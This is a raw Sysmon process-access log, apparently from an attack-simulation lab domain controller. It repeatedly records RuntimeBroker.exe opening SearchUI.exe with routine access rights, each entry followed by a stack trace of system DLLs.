13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011605Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011604Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011603Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011602Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011601Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011600Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011599Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011598Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011597Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011596Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011595Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011594Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011593Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011592Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011591Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011590Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011589Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011588Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011587Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 